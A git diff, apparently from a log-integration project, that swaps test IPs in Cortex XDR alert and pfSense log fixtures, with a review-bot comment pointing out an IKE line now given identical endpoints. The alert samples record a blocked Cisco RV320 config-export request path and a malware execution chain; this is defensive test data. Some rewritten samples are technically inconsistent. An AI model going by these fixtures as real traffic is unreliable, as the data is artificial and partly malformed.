(7.7.7.7/cgi-bin/config.exp)\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":null,\"mac_addresses\":[\"ab:ae:f5:sd:c8:6a\"],\"source\":\"PAN NGFW\",\"action\":\"BLOCKED_9\",\"action_pretty\":\"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)\"}", + "ingested": "2021-12-09T13:44:33.525006400Z", + "original": 
"{\"external_id\":\"396239671\",\"severity\":\"high\",\"matching_status\":\"UNMATCHABLE\",\"end_match_attempt_ts\":null,\"local_insert_ts\":1626347122923,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":null,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":\"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15\",\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"NO_HOST\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":null,\"mac\":\"4c:ae:a3:8e:c8:6a\",\"events\":{\"agent_install_type\":\"NA\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":10,\"dst_association_strength\":10,\"story_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_type\":\"Network Connections\",\"event_timestamp\":1626346867000,\"actor_process_instance_id\":null,\"actor_process_image_path\":null,\"actor_process_image_name\":null,\"actor_process_command_line\":null,\"actor_process_signature_status\":\"N/A\",\"actor_process_signature_vendor\":null,\"actor_process_image_sha256\":null,\"actor_process_image_md5\":null,\"actor_process_causality_id\":null,\"actor_causality_id\":null,\"actor_process_os_pid\":null,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":null,\"causality_actor_process_command_line\":null,\"causality_actor_process_image_path\":null,\"causality_actor_process_signature_vendor\":null,\"causality_actor_process_signature_status\":\"N/A\",\"causality_actor_causality_id\":null,\"causality_actor_process_execution_time\":null,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":null,\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":
null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":\"10.10.10.10\",\"action_local_port\":58642,\"action_remote_ip\":\"175.16.199.1\",\"action_remote_port\":443,\"action_external_hostname\":\"175.16.199.1\",\"action_country\":\"DK\",\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":null,\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":\"web-browsing\",\"fw_interface_from\":\"INTERNET\",\"fw_interface_to\":\"INTERNET\",\"fw_rule\":\"INTERNET_INTERNET_GlobalProtect-443\",\"fw_rule_id\":null,\"fw_device_name\":\"FW-DEVICE_NAME\",\"fw_serial_number\":\"12352345\",\"fw_url_domain\":\"9.9.9.9\",\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":\"internet-utility\",\"fw_app_category\":\"general-internet\",\"fw_app_technology\":\"browser-based\",\"fw_vsys\":\"vsys1\",\"fw_xff\":null,\"fw_misc\":\"7.7.7.7/cgi-bin/config.exp\",\"fw_is_phishing\":\"No\",\"dst_agent_id\":\"6.6.6.6\",\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":\"US\",\"dst_action_external_port\":null,\"contains_featured_host\":\"NO\",\"contains_featured_user\":\"NO\",\"contains_featured_ip\":\"NO\",\"image_name\":null,\"container_id\":null,
\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"2879211\",\"detection_timestamp\":1626346849000,\"name\":\"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability\",\"category\":\"Vulnerability\",\"endpoint_id\":\"192.168.2.2\",\"description\":\"Info-Leak (7.7.7.7/cgi-bin/config.exp)\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":null,\"mac_addresses\":[\"ab:ae:f5:sd:c8:6a\"],\"source\":\"PAN NGFW\",\"action\":\"BLOCKED_9\",\"action_pretty\":\"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)\"}", "kind": "alert", "created": "2021-07-15T11:00:49.000Z", "action": "BLOCKED_9", 
@@ -201,7 +203,7 @@ "event": { "severity": 3, "reason": "Suspicious executable detected", - "ingested": "2021-10-14T10:31:16.914805749Z", + "ingested": "2021-12-09T13:44:33.525009700Z", "original": "{\"external_id\":\"803fd786a6ba49c1bb642e3ba91a93c7\",\"severity\":\"medium\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1582275027631,\"local_insert_ts\":1582274996871,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":true,\"mac\":null,\"events\":{\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":null,\"event_type\":\"Process Execution\",\"event_timestamp\":1582274179588,\"actor_process_instance_id\":\"AdXokfzvxXMAAEB8AAAAAA==\",\"actor_process_image_path\":\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\gettools.exe\",\"actor_process_image_name\":\"gettools.exe\",\"actor_process_command_line\":\"gettools.exe\",\"actor_process_signature_status\":\"Unsigned\",\"actor_process_signature_vendor\":\"N/A\",\"actor_process_image_sha256\":\"4FEAF3340B663CCE76EE09D7621E43C8A0A4C89C1DE4734E2EF2C903C29C366F\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"actor_causality_id\":null,\"actor_process_os_pid\":16508,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\System32\\\\cmd.exe\\\" /C \\\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\win-install.cmd\\\" 
\",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"causality_actor_process_execution_time\":1582274147424,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"9a7c58bd98d70631aa1473f7b57b426db367d72429a5455b433a05ee251f3236\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":null,\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":nu
ll,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"389045\",\"detection_timestamp\":1582274179588,\"name\":\"WildFire Malware\",\"category\":\"Malware\",\"endpoint_id\":\"7e2caa3cfcba492ec3b7468356699991\",\"description\":\"Suspicious executable detected\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":\"test-hostname\",\"mac_addresses\":null,\"source\":\"XDR Agent\",\"action\":\"BLOCKED\",\"action_pretty\":\"Prevented (Blocked)\"}", "kind": "alert", "created": "2020-02-21T08:36:19.588Z", diff --git a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml index 2a4fbd5c614..1fc7ce8e8ec 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml +++ b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml @@ -50,6 +50,10 @@ external: ecs - name: destination.geo.country_name external: ecs +- name: destination.geo.region_iso_code + external: ecs +- name: destination.geo.region_name + external: ecs - name: destination.geo.location description: Longitude and latitude. example: '{ "lon": -73.614830, "lat": 45.505918 }' diff --git a/packages/panw_cortex_xdr/docs/README.md b/packages/panw_cortex_xdr/docs/README.md index 9e7d2daaa37..a2ec3ad0721 100644 --- a/packages/panw_cortex_xdr/docs/README.md +++ b/packages/panw_cortex_xdr/docs/README.md 
@@ -38,6 +38,8 @@ https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-api/cortex-xdr-ap
 | destination.geo.country_iso_code | Country ISO code. | keyword |
 | destination.geo.country_name | Country name. | keyword |
 | destination.geo.location | Longitude and latitude. | geo_point |
+| destination.geo.region_iso_code | Region ISO code. | keyword |
+| destination.geo.region_name | Region name. | keyword |
 | destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
 | destination.port | Port of the destination. | long |
 | dns.question.name | The name being queried. If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. | keyword |
diff --git a/packages/panw_cortex_xdr/manifest.yml b/packages/panw_cortex_xdr/manifest.yml
index 9505b0c0f24..8a75814550d 100644
--- a/packages/panw_cortex_xdr/manifest.yml
+++ b/packages/panw_cortex_xdr/manifest.yml
@@ -1,6 +1,6 @@
 name: panw_cortex_xdr
 title: Palo Alto Cortex XDR Logs
-version: 0.2.4
+version: 0.2.5
 release: beta
 description: Collect and parse logs from Palo Alto Cortex XDR API with Elastic Agent.
 type: integration
diff --git a/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log b/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log
index c796354bd71..47096d9c78e 100644
--- a/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log
+++ b/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log
@@ -1,15 +1,15 @@
-<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56
-<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56
+<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale
 <134>Jul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32
-<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale
 <134>1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49
-<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale
 <134>1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS
 <190>Jul 4 09:39:40 dhcpd[64305]: DHCPDISCOVER from 4c:55:41:a0:fa:99 via eth0.60
 <190>Jul 4 09:39:41 dhcpd[64305]: DHCPOFFER on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60
@@ -28,12 +28,12 @@
 <30>1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0
 <30>1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0
 <30>1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0
-<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes)
+<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)
 <29>Jul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_SSO=openurl
 <29>Jul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849
 <37>Jul 3 21:42:57 openvpn[19830]: user 'bob' authenticated
 <29>Jul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)
-<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745
+<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745
 <36>1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate.
 <30>Aug 15 16:19:02 unbound[26931]: [26931:0] info: 192.168.1.1 api.opensubtitles.org. A IN
 <30>Aug 15 16:18:59 unbound[26931]: [26931:2] info: 172.16.33.2 clients4.google.com. A IN
\ No newline at end of file
diff --git a/packages/pfsense/changelog.yml b/packages/pfsense/changelog.yml
index b19b8f91d31..93c51438ae6 100644
--- a/packages/pfsense/changelog.yml
+++ b/packages/pfsense/changelog.yml
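Review bot: The rewritten charon line now reads `sending packet: from 175.16.199.1[500] to 175.16.199.1[500]`, so the IKE sample has identical local and remote endpoints. A parser that swapped source and destination, or dropped one of them, would produce the same result for this line, and no real IKE exchange looks like this. Keep two distinct addresses — 175.16.199.1 on one side and a second address from the supported subset on the other — so the source/destination split in the sample stays observable; the openvpn line below it has only one remote and is fine as changed.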
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.2.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "0.2.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log
index 8e040bdce2f..cf1e3479197 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log
@@ -1,19 +1,19 @@
-<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56
-<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56
+<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale
 <134>Jul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32
-<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale
 <134>Jul 3 19:10:33 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0x0,,64,29691,0,DF,17,udp,78,10.170.27.41,10.170.27.255,137,137,58
-<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale
-<134>Jul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,239.255.255.250,datalength=8
-<134>Jul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,142.250.114.105,request,37728,164
+<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale
+<134>Jul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8
+<134>Jul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164
 <134>Jul 4 11:10:54 filterlog[72237]: 199,,,1557957510,igb1.15,match,pass,in,4,0x0,,64,0,0,DF,1,icmp,84,10.100.15.13,10.100.15.1,request,0,064
\ No newline at end of file
